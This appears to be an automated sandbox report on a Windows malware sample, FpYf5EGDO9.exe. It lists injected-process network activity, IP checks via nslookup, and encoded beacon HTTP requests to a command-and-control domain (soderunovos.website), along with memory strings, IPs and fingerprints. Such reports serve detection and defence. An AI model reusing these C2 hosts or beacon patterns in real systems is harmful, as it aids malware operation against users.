Source:	Binary string: ntdll.pdb source: FpYf5EGDO9.exe, 00000000.00000003.458681957.0000000005D50000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: FpYf5EGDO9.exe, 00000000.00000003.458681957.0000000005D50000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\i1aaekli.pdb source: powershell.exe, 0000000E.00000002.590639322.000001A9845B8000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\i1aaekli.pdbXP source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_0374A2FE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_0373E9AC memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,

Networking:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: lycos.com
Source: C:\Windows\explorer.exe	Domain query: mail.yahoo.com
Source: C:\Windows\explorer.exe	Domain query: login.yahoo.com
Source: C:\Windows\explorer.exe	Domain query: www.lycos.com

Uses nslookup.exe to query domains

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

May check the online IP address of the machine

Show sources

Source: C:\Windows\System32\nslookup.exe	DNS query: name: myip.opendns.com
Source: C:\Windows\System32\nslookup.exe	DNS query: name: myip.opendns.com

Uses ping.exe to check the status of other devices and networks

Show sources

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: Joe Sandbox View	JA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: yahoo.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.yahoo.comCookie: B=emaekhlgpqi05&b=3&s=ke
Source: global traffic	HTTP traffic detected: GET /jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3LtU8rWKiGuaw8/NuVUF4C1kJEvzo9/4q_2FzKx_2BoAuXF6T/M0a9puLXo/g7QZ3Z41pnSqstIxrJFr/XQfDXm0MsROvBP6zJyK/pIVUVQiiCBcAOAJCd7Rzb1/y_2BZhUKXYwpc/xuZh04Cte3g_2F/_2Bc.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctWO8vLxko/alAFtnlNlG6Q7/I30RLNMi/fUrGHRWZ_2Br2a8odLCOSy2/Pp0uf39xNF/zw_2Bgb01eHiph9fS/HUtF_2BI_2FW/KJsziSAbwfK/PI_2FrcgGvn_2F/if7htk49j1cWEP5dTbASH/YfWHdUallNi/oU.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
Source: global traffic	HTTP traffic detected: GET /jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/rat2KiIdmFuMYJV01lFIUuv/pv1M_2F42q/2ghlrrK6HyvaK1iGn/6FWd3U6RwdJs/DwljQfV1T1s/A2jFEhH_2FVbra/gemmgKqmTU3dGSSrHsVgF/6KFwQzXOgNC787ml/o9EUNqnCP/_2FVV.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
Source: global traffic	HTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: lycos.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
Source: global traffic	HTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
Source: global traffic	HTTP traffic detected: GET /images/ULsdPIVaor8tHILk/0ulmqbrH6ITnKv9/hjuxJRtL9AnqjM_2F9/31KQzlJ4A/RADn_2B9K7qN4OIWzhqt/e9pg3qo9NJvDplsJyu_/2BINJhitzziIxZ5FGe3dQs/qXLEJMLfrql94/pbynvtsD/hbcZQz4rDORcqa20GNWm_2B/AEaRjxdvZi/WJoDjLGRG7wMNfA10/47LdHNX1Ihp_/2F5oAPCKnfW/OXUd0uJQ9lRCE3/_2Bk_2BnDXgKUHje_2FRL/1haIbjYdfbhVAxGo/8KwtG_2Fq/c.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: mail.yahoo.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2FULsdPIVaor8tHILk%2F0ulmqbrH6ITnKv9%2FhjuxJRtL9AnqjM_2F9%2F31KQzlJ4A%2FRADn_2B9K7qN4OIWzhqt%2Fe9pg3qo9NJvDplsJyu_%2F2BINJhitzziIxZ5FGe3dQs%2FqXLEJMLfrql94%2FpbynvtsD%2FhbcZQz4rDORcqa20GNWm_2B%2FAEaRjxdvZi%2FWJoDjLGRG7wMNfA10%2F47LdHNX1Ihp_%2F2F5oAPCKnfW%2FOXUd0uJQ9lRCE3%2F_2Bk_2BnDXgKUHje_2FRL%2F1haIbjYdfbhVAxGo%2F8KwtG_2Fq%2Fc.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: login.yahoo.com

Source: Joe Sandbox View

ASN Name: M247GB M247GB

Source: Joe Sandbox View	IP Address: 89.44.9.140 89.44.9.140
Source: Joe Sandbox View	IP Address: 74.6.143.26 74.6.143.26

Source: FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000E.00000003.441167820.000001A9988C5000.00000004.00000001.sdmp	String found in binary or memory: http://crl.micro
Source: FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cmg
Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.co/xa
Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.ux
Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.uxs
Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobp/
Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobp/3
Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp	String found in binary or memory: http://ns.micro/1
Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp	String found in binary or memory: http://ns.micro/1S
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000E.00000002.545761231.000001A980231000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lan
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=8vo
Source: powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp	String found in binary or memory: https://qoderunovos.website
Source: FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp	String found in binary or memory: https://soderunovos.website
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: https://soderunovos.website/
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: https://soderunovos.website/jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3L
Source: FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmp	String found in binary or memory: https://soderunovos.website/jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: https://soderunovos.website/jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctW
Source: FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp	String found in binary or memory: https://soderunovos.websitehttps://qoderunovos.websiteo
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com//
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fj
Source: FpYf5EGDO9.exe, 00000000.00000003.351362297.0000000002289000.00000004.00000001.sdmp, FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fHHAQ457B0GtLskLkv%2fZiz
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/R
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqc
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/u
Source: FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmp	String found in binary or memory: https://yahoo.com/
Source: FpYf5EGDO9.exe, 00000000.00000002.510452658.0000000002219000.00000004.00000001.sdmp	String found in binary or memory: https://yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHL

Source: unknown

DNS traffic detected: queries for: yahoo.com

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Code function: 0_2_03C45988 ResetEvent,ResetEvent,lstrcat,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,

Source: global traffic	HTTP traffic detected: GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: yahoo.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.yahoo.comCookie: B=emaekhlgpqi05&b=3&s=ke
Source: global traffic	HTTP traffic detected: GET /jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3LtU8rWKiGuaw8/NuVUF4C1kJEvzo9/4q_2FzKx_2BoAuXF6T/M0a9puLXo/g7QZ3Z41pnSqstIxrJFr/XQfDXm0MsROvBP6zJyK/pIVUVQiiCBcAOAJCd7Rzb1/y_2BZhUKXYwpc/xuZh04Cte3g_2F/_2Bc.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctWO8vLxko/alAFtnlNlG6Q7/I30RLNMi/fUrGHRWZ_2Br2a8odLCOSy2/Pp0uf39xNF/zw_2Bgb01eHiph9fS/HUtF_2BI_2FW/KJsziSAbwfK/PI_2FrcgGvn_2F/if7htk49j1cWEP5dTbASH/YfWHdUallNi/oU.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
Source: global traffic	HTTP traffic detected: GET /jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/rat2KiIdmFuMYJV01lFIUuv/pv1M_2F42q/2ghlrrK6HyvaK1iGn/6FWd3U6RwdJs/DwljQfV1T1s/A2jFEhH_2FVbra/gemmgKqmTU3dGSSrHsVgF/6KFwQzXOgNC787ml/o9EUNqnCP/_2FVV.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
Source: global traffic	HTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: lycos.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
Source: global traffic	HTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
Source: global traffic	HTTP traffic detected: GET /images/ULsdPIVaor8tHILk/0ulmqbrH6ITnKv9/hjuxJRtL9AnqjM_2F9/31KQzlJ4A/RADn_2B9K7qN4OIWzhqt/e9pg3qo9NJvDplsJyu_/2BINJhitzziIxZ5FGe3dQs/qXLEJMLfrql94/pbynvtsD/hbcZQz4rDORcqa20GNWm_2B/AEaRjxdvZi/WJoDjLGRG7wMNfA10/47LdHNX1Ihp_/2F5oAPCKnfW/OXUd0uJQ9lRCE3/_2Bk_2BnDXgKUHje_2FRL/1haIbjYdfbhVAxGo/8KwtG_2Fq/c.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: mail.yahoo.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2FULsdPIVaor8tHILk%2F0ulmqbrH6ITnKv9%2FhjuxJRtL9AnqjM_2F9%2F31KQzlJ4A%2FRADn_2B9K7qN4OIWzhqt%2Fe9pg3qo9NJvDplsJyu_%2F2BINJhitzziIxZ5FGe3dQs%2FqXLEJMLfrql94%2FpbynvtsD%2FhbcZQz4rDORcqa20GNWm_2B%2FAEaRjxdvZi%2FWJoDjLGRG7wMNfA10%2F47LdHNX1Ihp_%2F2F5oAPCKnfW%2FOXUd0uJQ9lRCE3%2F_2Bk_2BnDXgKUHje_2FRL%2F1haIbjYdfbhVAxGo%2F8KwtG_2Fq%2Fc.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: login.yahoo.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 23 Nov 2021 19:59:01 GMTp3p: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"cache-control: privatex-content-type-options: nosniffcontent-type: text/html; charset=UTF-8x-envoy-upstream-service-time: 14server: ATSContent-Length: 1052Age: 1Connection: closeStrict-Transport-Security: max-age=31536000Content-Security-Policy: frame-ancestors 'self' https://.builtbygirls.com https://.rivals.com https://.engadget.com https://.intheknow.com https://.autoblog.com https://.techcrunch.com https://.yahoo.com https://.aol.com https://.huffingtonpost.com https://.oath.com https://.search.yahoo.com https://.search.aol.com https://.search.huffpost.com https://.verizonmedia.com https://.publishing.oath.com https://.autoblog.com; sandbox allow-forms allow-same-origin allow-scripts allow-popups allow-popups-to-escape-sandbox allow-presentation; report-uri https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=8voena9gpqi06&partner=;X-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=block
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Nov 2021 20:01:39 GMTServer: ApacheContent-Security-Policy: frame-ancestors 'self' *.lycos.comX-Powered-By: PHP/7.2.24Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8

